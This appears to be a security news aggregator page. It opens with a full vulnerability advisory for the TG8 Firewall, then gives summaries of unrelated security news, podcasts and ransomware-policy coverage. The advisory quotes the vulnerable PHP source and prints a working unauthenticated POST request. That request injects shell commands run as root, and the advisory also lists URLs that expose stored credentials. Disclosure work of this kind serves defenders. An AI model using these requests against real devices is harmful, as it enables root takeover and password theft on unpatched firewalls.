SSD Advisory – TG8 Firewall PreAuth RCE and Password Disclosure

TL;DR

Find out how vulnerabilities in TG8 Firewall allows remote unauthenticated users to execute arbitrary code on the remote device as well as disclose the passwords of existing accounts.

Vulnerability Summary

Two security vulnerabilities in TG8 Firewall have been found allowing a remote user to execute commands as root user without needing to authenticate with the device or have any privileged access, the second vulnerability allows to expose existing users’ passwords without being authenticated with the remote device.

CVE

Pending

Credit

An independent security researcher has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions
TG8 Firewall

Vendor Response

Numerous attempts to contact the vendor via Twitter, Facebook and Emails have not triggered any response from the vendor. We urge customers of this product to immediately block internet facing port 80/443 used for administering the device – it can be easily compromised.

Vulnerability Analysis

PreAuth RCE

The vulnerability exists in the way the authentication request is handled, due to which it leads to a remote command execution vulnerability with root user privileges. The data passed via user and password parameters is directly used as a parameter of a Linux command which allows command execution.

index.php source code

If you examine the index.php file you will notice that it calls a command called runphpcmd.php with a value of ‘sudo /home/TG8/v3/syscmd/check_gui_login.sh ‘ + username + ‘ ‘ + pass; this is very strange and very unusual, but what you should immediately notice its basically calling a command prefixed with sudo and examines the response to that command.

Obviously if we change the cmd being called we can theoretically execute any command, but lets first verify what runphpcmd.php does – as it may be filtering or limiting what commands can be run:

…
function checkLogin() {
var username = $(‘input[name=u]’).val();
var pass = $(‘input[name=p]’).val();
var cmd = ‘sudo /home/TG8/v3/syscmd/check_gui_login.sh ‘ + username + ‘ ‘ + pass;
$.ajax({
url: “runphpcmd.php”,
type: “post”,
dataType: “json”,
cache: “false”,
data: {
syscmd: cmd
},
success: function (x) {
if (x == ‘OK’) {
ok(username);
} else {
failed();
}
},
error: function () {
ok(username);
// alert(“failure to excute the command”);
}
})
}
…

runphpcmd.php source code

As can be seen in the source code of runphpcmd.php we can note that there is no verification of what syscmd is running and the outcome is returned in JSON format back to the caller of this file:

<?php
header(‘Content-Type: application/json’);
$response= array();
$output= array();
$cmd_1 = $_POST[‘syscmd’];
$data = ‘cmd= ‘.$cmd_1.”n”;
$fp = fopen(‘/opt/phpJS.log’, ‘a’);
fwrite($fp, $data);
exec($cmd_1,$output,$ret);
$data = ‘ output =’. json_encode($output).”n*******************************************************n”;
$fp = fopen(‘/opt/phpJS.log’, ‘a’);
fwrite($fp, $data);
$response[] = array(“result” => $output);
// Encoding array in JSON format
echo json_encode($output);
?>

Exploit

POST http://<server>/admin/runphpcmd.php HTTP/1.1
Host: Server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: keep-alive
syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+<command here>++local

The value passed via the parameter syscmd is not sanitized which leads to RCE

ex: ls Command executed in below request. Payload: ;ls;

syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bls%3B++local

The response for the above request will contain result for the command execution.

Password Disclosure

A folder that is insecurely accessible to remote unauthenticated users /data/ stores the credentials of previously logged on users. Since this folder doesn’t require any special access to access – enumerating the files that are located under it can be used to reveal accounts present on the TG8 Firewall.

Example URLs:

http://<server>/data/w-341.tg
http://<server>/data/w-342.tg
http://<server>/data/r-341.tg
http://<server>/data/r-342.tg
Read More

The post SSD Advisory – TG8 Firewall PreAuth RCE and Password Disclosure appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/ssd-advisory-tg8-firewall-preauth-rce-and-password-disclosure/?utm_source=rss&utm_medium=rss&utm_campaign=ssd-advisory-tg8-firewall-preauth-rce-and-password-disclosure

Remembering Dan Kaminsky, Apple AirDrop Vulnerability

Remembering Dan Kaminsky who was one of the greatest security researchers of our time plus details on a new Apple Airdrop vulnerability. ** Links mentioned on the show ** Remembering Dan Kaminsky https://www.nytimes.com/2021/04/27/technology/daniel-kaminsky-dead.html Apple AirDrop Bug Could Leak Your Personal Info to Anyone Nearby https://thehackernews.com/2021/04/apple-airdrop-bug-could-leak-your.html https://www.komando.com/security-privacy/apple-airdrop-security-flaw/787628/ ** Watch this episode on YouTube ** https://youtu.be/N6T6qcRfTBA ** […]

The post Remembering Dan Kaminsky, Apple AirDrop Vulnerability appeared first on The Shared Security Show.

The post Remembering Dan Kaminsky, Apple AirDrop Vulnerability appeared first on Security Boulevard.

Read More

The post Remembering Dan Kaminsky, Apple AirDrop Vulnerability appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/remembering-dan-kaminsky-apple-airdrop-vulnerability/?utm_source=rss&utm_medium=rss&utm_campaign=remembering-dan-kaminsky-apple-airdrop-vulnerability

3 Best Practices for Customizing Your Compliance Program

Most large-scale entities need to prove compliance with multiple regulatory standards. In their efforts to meet their compliance mandates, organizations could suffer a major drain on their time and resources. This possibility holds true regardless of whether they’re finance companies, retailers, manufacturers or hospitality firms. Organizations face an additional obstacle when they have an internally […]… Read More

The post 3 Best Practices for Customizing Your Compliance Program appeared first on The State of Security.

The post 3 Best Practices for Customizing Your Compliance Program appeared first on Security Boulevard.

Read More

The post 3 Best Practices for Customizing Your Compliance Program appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/3-best-practices-for-customizing-your-compliance-program/?utm_source=rss&utm_medium=rss&utm_campaign=3-best-practices-for-customizing-your-compliance-program

6 Steps To Improve Your Data Security and Data Compliance

Data privacy has been a hot topic in the tech world for years now. With every new technology come new regulations that require companies to completely re-examine the way they handle private data. Most companies already have a basic data privacy policy they constructed alongside lawyers and tech experts to avoid facing serious fines and […]… Read More

The post 6 Steps To Improve Your Data Security and Data Compliance appeared first on The State of Security.

The post 6 Steps To Improve Your Data Security and Data Compliance appeared first on Security Boulevard.

Read More

The post 6 Steps To Improve Your Data Security and Data Compliance appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/6-steps-to-improve-your-data-security-and-data-compliance/?utm_source=rss&utm_medium=rss&utm_campaign=6-steps-to-improve-your-data-security-and-data-compliance

ISC Stormcast For Monday, May 3rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7482, (Mon, May 3rd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post ISC Stormcast For Monday, May 3rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7482, (Mon, May 3rd) appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/isc-stormcast-for-monday-may-3rd-2021-https-isc-sans-edu-podcastdetail-htmlid7482-mon-may-3rd/?utm_source=rss&utm_medium=rss&utm_campaign=isc-stormcast-for-monday-may-3rd-2021-https-isc-sans-edu-podcastdetail-htmlid7482-mon-may-3rd

FIPAC: Thwarting Fault- and Software-Induced Control-Flow Attacks with ARM Pointer Authentication

Read More

The post FIPAC: Thwarting Fault- and Software-Induced Control-Flow Attacks with ARM Pointer Authentication appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/fipac-thwarting-fault-and-software-induced-control-flow-attacks-with-arm-pointer-authentication/?utm_source=rss&utm_medium=rss&utm_campaign=fipac-thwarting-fault-and-software-induced-control-flow-attacks-with-arm-pointer-authentication

A comparative study of neural network techniques for automatic software vulnerability detection

Read More

The post A comparative study of neural network techniques for automatic software vulnerability detection appeared first on Malware Devil.

https://malwaredevil.com/2021/05/03/a-comparative-study-of-neural-network-techniques-for-automatic-software-vulnerability-detection/?utm_source=rss&utm_medium=rss&utm_campaign=a-comparative-study-of-neural-network-techniques-for-automatic-software-vulnerability-detection

Six things you have to know about ITAR compliance

  International Traffic in Arms Regulations (ITAR) is a set of regulations administered by the State Department to control the export of defense and military related technologies. The goal of the legislation is to control access to specific types of technology and their associated data by our country’s enemies.   Any U.S. company, research lab […]

The post Six things you have to know about ITAR compliance appeared first on PreVeil.

The post Six things you have to know about ITAR compliance appeared first on Security Boulevard.

Read More

The post Six things you have to know about ITAR compliance appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/six-things-you-have-to-know-about-itar-compliance/?utm_source=rss&utm_medium=rss&utm_campaign=six-things-you-have-to-know-about-itar-compliance

PuTTY And FileZilla Use The Same Fingerprint Registry Keys, (Sun, May 2nd)

Many SSH clients can remember SSH servers’ fingerprints. This can serve as a safety mechanism: you get a warning when the server you want to connect to, has no longer the same fingerprint. And then you can decide what to do: continue with the connection, or stop and try to figure out what is going on.

This happened to me a couple of months ago. I wanted to transfer some files over SSH with FileZilla, and received a prompt that the server I usually connect to, had an unknown fingerprint. I did not go through with the connection, and started to investigate what was going on.

Long story short: I had removed SSH fingerprints cached by PuTTY in the Windows registry, and this impacted FileZilla: both use the same registry keys for their fingerprint cache.

You can see the registry keys here in FileZilla’s source code:

If you do forensics on Windows machines, be aware that these registry keys are not only used by PuTTY, but also by FileZilla’s fzsftp.exe module.

I have more details here if you are interested.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post PuTTY And FileZilla Use The Same Fingerprint Registry Keys, (Sun, May 2nd) appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/putty-and-filezilla-use-the-same-fingerprint-registry-keys-sun-may-2nd/?utm_source=rss&utm_medium=rss&utm_campaign=putty-and-filezilla-use-the-same-fingerprint-registry-keys-sun-may-2nd

Curo/bin

This post wraps up another Twitter thread I started a few days ago: If you ever get bored using “copy” to copy files you can always use … curl: curl […]
Read More

The post Curo/bin appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/curo-bin/?utm_source=rss&utm_medium=rss&utm_campaign=curo-bin

Throwing LOLBIN a tar ball

This post summarizes some of the findings I posted on Twitter the other day. While looking at Windows version of tar.exe I discovered that it includes lots of undocumented command […]
Read More

The post Throwing LOLBIN a tar ball appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/throwing-lolbin-a-tar-ball/?utm_source=rss&utm_medium=rss&utm_campaign=throwing-lolbin-a-tar-ball

Gup o/ bin

Notepad ++ comes with a built-in Updater called GUP typically located here: c:Program Files (x86)Notepad++updaterGUP.exe It is a generic downloader that accepts a range of command line arguments, and while […]
Read More

The post Gup o/ bin appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/gup-o-bin/?utm_source=rss&utm_medium=rss&utm_campaign=gup-o-bin

FTP.EXE Lolbin v2

@0gtweet‘s tweet inspired me to look at lolbin stuff again (as it is often the case). So… everyone knows we can use ftp.exe as a lolbin and using COMSPEC trick […]
Read More

The post FTP.EXE Lolbin v2 appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/ftp-exe-lolbin-v2/?utm_source=rss&utm_medium=rss&utm_campaign=ftp-exe-lolbin-v2

CPDP 2021 – Moderator: John Davisson ‘Student Privacy At Risk Under Covid-19: Online Test Proctoring Brings AI And Surveillance Into Students’ Homes’

Speakers: Lydia X. Z. Brown, Meg Foulkes, Sofie Van Londen, Maha Bali

Our sincere thanks to CPDP 2021 – Computers, Privacy & Data Protection Conference for publishing their well-crafted videos on the organization’s YouTube channel. Enjoy!

Permalink

The post CPDP 2021 – Moderator: John Davisson ‘Student Privacy At Risk Under Covid-19: Online Test Proctoring Brings AI And Surveillance Into Students’ Homes’ appeared first on Security Boulevard.

Read More

The post CPDP 2021 – Moderator: John Davisson ‘Student Privacy At Risk Under Covid-19: Online Test Proctoring Brings AI And Surveillance Into Students’ Homes’ appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/cpdp-2021-moderator-john-davisson-student-privacy-at-risk-under-covid-19-online-test-proctoring-brings-ai-and-surveillance-into-students-homes/?utm_source=rss&utm_medium=rss&utm_campaign=cpdp-2021-moderator-john-davisson-student-privacy-at-risk-under-covid-19-online-test-proctoring-brings-ai-and-surveillance-into-students-homes

XKCD ‘After The Pandemic’

via the comic delivery system monikered Randall Munroe at XKCD!

Permalink

The post XKCD ‘After The Pandemic’ appeared first on Security Boulevard.

Read More

The post XKCD ‘After The Pandemic’ appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/xkcd-after-the-pandemic/?utm_source=rss&utm_medium=rss&utm_campaign=xkcd-after-the-pandemic

CPDP 2021 – Moderator: Brent R. Homan ‘When Regulatory Worlds Collide – The Intersection Of Privacy, Competition And Consumer Protection’

Speakers: Anna Colaps, Erika M. Douglas, Ian Cohen, Alan Campos Elias Thomaz

Our sincere thanks to CPDP 2021 – Computers, Privacy & Data Protection Conference for publishing their well-crafted videos on the organization’s YouTube channel. Enjoy!

Permalink

The post CPDP 2021 – Moderator: Brent R. Homan ‘When Regulatory Worlds Collide – The Intersection Of Privacy, Competition And Consumer Protection’ appeared first on Security Boulevard.

Read More

The post CPDP 2021 – Moderator: Brent R. Homan ‘When Regulatory Worlds Collide – The Intersection Of Privacy, Competition And Consumer Protection’ appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/cpdp-2021-moderator-brent-r-homan-when-regulatory-worlds-collide-the-intersection-of-privacy-competition-and-consumer-protection/?utm_source=rss&utm_medium=rss&utm_campaign=cpdp-2021-moderator-brent-r-homan-when-regulatory-worlds-collide-the-intersection-of-privacy-competition-and-consumer-protection

[Open-Xchange] high – SSRF – Unchecked Snippet IDs for distributed files (1500.00USD)

Read More

The post [Open-Xchange] high – SSRF – Unchecked Snippet IDs for distributed files (1500.00USD) appeared first on Malware Devil.

https://malwaredevil.com/2021/05/02/open-xchange-high-ssrf-unchecked-snippet-ids-for-distributed-files-1500-00usd-2/?utm_source=rss&utm_medium=rss&utm_campaign=open-xchange-high-ssrf-unchecked-snippet-ids-for-distributed-files-1500-00usd-2

Security Is Top Priority In Latest Chrome Build

Back in February, Google began experimenting with a new feature that defaulted all URLs to use “https:” rather than the less secure “http:.”

While defaulting to the secure socket layer isn’t ironclad protection for ‘netizins, it’s certainly a step in the right direction, which is why Google recently promoted the change out of the canary builds and into the mainstream.

Right now, if you download and install Chrome 90, you’ll find that this protection is automatic. You don’t have to do anything beyond installing Chrome 90.

In addition to offering the protection outlined above, Chrome 90 also includes nearly 40 security fixes, including resolving 3 low-severity flaws, 10 medium-severity flaws and six high-severity issues.

Finally, Chrome 90 includes the AV1 encoder, which provides enhanced support for a number of video-conferencing applications including Webex, Meet, and Duo. Among other things, AV1 offers improved screen sharing capabilities and allows users on low bandwidth networks to utilize video.

All that to say, Chrome 90 is an update you don’t want to miss. If it’s been a while since you paid attention to Chrome updates and you’re a bit behind the times, this is one upgrade you’ll definitely want to make a priority. While nothing in the build is particularly flashy, it does provide solid protection. That, combined with the fact that it addresses a wide range of security issues as described above, and includes a raft of other enhancements makes it well worth getting.

Kudos to Google for continuing to put user security front and center and making it an integral part of their product improvement road map. While it’s true that there are other companies out there that are even more active when it comes to bolstering user security, the number is small enough that you could probably count them on one hand with fingers left over.

Used with permission from Article Aggregator

Read More

The post Security Is Top Priority In Latest Chrome Build appeared first on Malware Devil.

https://malwaredevil.com/2021/05/01/security-is-top-priority-in-latest-chrome-build/?utm_source=rss&utm_medium=rss&utm_campaign=security-is-top-priority-in-latest-chrome-build

YARA Release v4.1.0, (Sat, May 1st)

YARA version 4.1.0 was released.

There are no major changes. Some new string testing functions: icontains, …

Most surprising to me was the addition of the t escape sequence in text strings. I didn’t know this wasn’t supported in prior versions.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post YARA Release v4.1.0, (Sat, May 1st) appeared first on Malware Devil.

https://malwaredevil.com/2021/05/01/yara-release-v4-1-0-sat-may-1st/?utm_source=rss&utm_medium=rss&utm_campaign=yara-release-v4-1-0-sat-may-1st

Task Force delivers strategic plan to address global ransomware problem

The Ransomware Task Force (RTF), a think tank composed of more than 60 volunteer experts who represent organizations encompassing industries and governments, has recently pushed out a comprehensive and strategic plan for tackling the increasing threat and evolution of ransomware.

The report, entitled “Combating Ransomware – A Comprehensive Framework for Action: Key Recommendations from the Ransomware Task Force”, which you can read here [PDF]  advocates for “a unified, aggressive, comprehensive, public-private anti-ransomware campaign.”

The purpose of creating the document seems to be threefold: first, to educate the targeted reader—in this case, policy makers and industry leaders—about the dangers of ransomware; second, to call for unification amongst organizations to collectively beat the ransomware enterprise; and third, to guide organizations and governments on action items (48 in total) they can pursue to disrupt the ransomware-as-a-service (RaaS) model and extensively lessen the impact of current and future attacks.

“This is great news and sorely needed,” says Jerome Segura, Director of Threat Intelligence at Malwarebytes, in an email. “One key aspect is, of course, international cooperation (or the lack thereof) which has proven to be a key reason why many criminals from Eastern Europe can continue their business without real fear of prosecution.”

Ransomware: a threat to national security

Ransomware attacks had been popping up left and right, even before the COVID-19 pandemic threw a wrench into cybersecurity efforts of many already challenged companies and industries. Ransom demands inflated steeply through the pandemic, and the money raised appears to be being reflected in increasing innovation and sophistication.

The report quantifies the impact of a ransomware attacks with some startling statistics. According to the RTF the average ransom payment in 2020 was $312,493, an increase of 171% over the previous year. Perhaps even more costly and damaging, it puts the average time it takes to fully recover from a ransomware attack at just over nine months.

Ransomware statistics collated by the task force (Source: The RTF Report 2020)

Note that these are average numbers, which means that there are cases when organizations have dealt with much longer downtimes and paid far higher ransoms (demands go into the tens of millions) to get their businesses back up and running as quickly as possible.

Gone are the days when threat actors behind ransomware campaigns targeted organizations they thought had the means to readily cough up money to meet their demands. These past few years, ransomware gangs have become more opportunistic, perhaps comforted by the wide availability of ransom insurance. They have deliberately targeted networks and breached systems of vital infrastructure, such as hospitals, schools, local governments, and nuclear plants, knowing full well that they may be putting lives at risk.

Organizations who refuse to pay the ransom have then to deal with the data leaking that will inevitably follow; the delays caused by identifying and fixing the problems that allowed the ransomware gang into its systems; and the cost to undergo crisis management efforts and generally getting back on track as quickly as possible, while also increasing their overall cybersecurity posture. On the other hand, organizations who do pay the ransom get to spend millions of dollars, too, on top of the ransom payment and still aren’t guaranteed to get their data back, or a speedy recovery.

Ransom payments may then used to fund criminal enterprises that, for example, engage in human trafficking, terrorism, and “the proliferation of mass destruction”. But perhaps the most damaging of all is that ransomware attacks can sow doubt in the minds of the public towards public institutions.

To add salt to the wound, ransomware threat actors do this from within countries that are turning a blind eye to, or even encouraging, these cybercrime campaigns. They are safe havens where gangs know they won’t be charged, prosecuted or extradited for their actions. It is not difficult then to see why the RTF urged its audience to “raise the priority of ransomware within the intelligence community, and designate it as a national security threat” while advocating the use of “criminal prosecution and other tactics”.

Core actions organizations and governments must take

Although there are multiple steps recommended in the report, the RTF prescribes that these steps should be viewed and considered part of a bigger whole as they were each designed to complement and build on each other.

According to the report:

“The strategic framework is organized around four primary goals: to deter ransomware attacks through a nationally and internationally coordinated, comprehensive strategy; to disrupt the business model and reduce criminal profits; to help organizations prepare for ransomware attacks; and to respond to ransomware attacks more effectively.”

To see the necessary impact against the ransomware enterprise, the task force stresses the importance of adopting these steps as soon as possible, with continuous coordination among the involved parties at a national and international level. (The RTF has proposed that the US government take charge in international coordination efforts with its partners.)

Among its priority recommendations, the RTF proposes that greater prioritization be given to an intelligence-driven anti-ransomware efforts; mandatory reporting of ransomware attacks and the creation of Cyber Response and Recovery funds; the development of a framework to help organizations prepare for, and respond to, ransomware attacks; and greater regulation of the cryptocurrency sector.

Among the action items to be done, these are the five most urgent, according to the Ransomware Task Force. The rest are supporting actions that strengthen or lead to the fulfillment of these five. (Source: The RTF Report 2020)

About the RTF and other anti-ransomware efforts

The Institute of Security and Technology (IST) is the host organization that launched the Ransomware Task Force four months ago in December 2020. Before this, significant efforts have been made by organizations within or associated with the cybersecurity industry in combating ransomware.

In January this year, the Cybersecurity and Infrastructure Security Agency (CISA) launched the Reduce the Risk of Ransomware Campaign where it focused on educating the public and private sectors on anti-ransomware best practices and what tools and resources to use to mitigate attacks. CISA’s one-stop page for everything one needs to know about ransomware can be found on this CISA ransomware page.

In July 2016, Europol’s European Cybercrime Centre joined forces with other law enforcement bodies and IT security companies to launch No More Ransom (NMR). Similar to the above mentioned efforts, NMR also aims to help victims recover their data without shelling out money. They do this by collating decryption tools for ransomware families, created by cybersecurity volunteers. You can learn more about No More Ransom by visiting its official website.

The post Task Force delivers strategic plan to address global ransomware problem appeared first on Malwarebytes Labs.

The post Task Force delivers strategic plan to address global ransomware problem appeared first on Malware Devil.

https://malwaredevil.com/2021/04/30/task-force-delivers-strategic-plan-to-address-global-ransomware-problem-10/?utm_source=rss&utm_medium=rss&utm_campaign=task-force-delivers-strategic-plan-to-address-global-ransomware-problem-10